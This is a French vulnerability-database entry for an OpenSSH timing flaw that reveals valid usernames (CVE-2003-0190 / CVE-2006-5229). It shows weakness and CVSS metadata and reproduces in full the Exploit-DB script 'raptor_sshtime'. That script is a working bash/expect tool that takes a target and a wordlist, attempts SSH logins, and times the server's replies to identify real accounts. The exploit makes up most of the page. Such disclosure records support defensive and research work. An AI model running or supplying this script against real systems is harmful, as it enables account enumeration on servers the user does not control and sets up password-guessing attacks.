Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-200 |
Exposure of Sensitive Information to an Unauthorized Actor The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
2.6 |
|
AV:N/AC:H/Au:N/C:P/I:N/A:N |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 3303
Date de publication : 2007-02-12 23h00 +00:00
Auteur : Marco Ivaldi
EDB Vérifié : Yes
#!/bin/bash
#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears that this issue is dependent on the use of
# manually-set passwords that causes delays when processing /etc/shadow due to
# an increased number of rounds (CVE-2006-5229).
#
# This is a simple shell script based on expect meant to remotely analyze
# timing differences in sshd "Permission denied" replies. Depending on OpenSSH
# version and configuration, it may lead to disclosure of valid usernames.
#
# Usage example:
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#
# Some vars
port=22
# Command line
host=$1
dict=$2
# Local functions
function head() {
echo ""
echo "raptor_sshtime - [Open]SSH remote timing attack exploit"
echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo ""
}
function foot() {
echo ""
exit 0
}
function usage() {
head
echo "[make sure the target hostkey has been approved before]"
echo ""
echo "usage : ./sshtime <target> <wordlist>"
echo "example: ./sshtime 192.168.0.1 dict.txt"
foot
}
function notfound() {
head
echo "error : expect interpreter not found!"
foot
}
# Check if expect is there
expect=`which expect 2>/dev/null`
if [ $? -ne 0 ]; then
notfound
fi
# Input control
if [ -z "$2" ]; then
usage
fi
# Perform the bruteforce attack
head
for user in `cat $dict`
do
echo -ne "$user@$host\t\t"
(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
done
foot
# milw0rm.com [2007-02-13]
Products Mentioned
Configuraton 0
Openbsd>>Openssh >> Version 4.1
Novell>>Suse_linux >> Version *
Références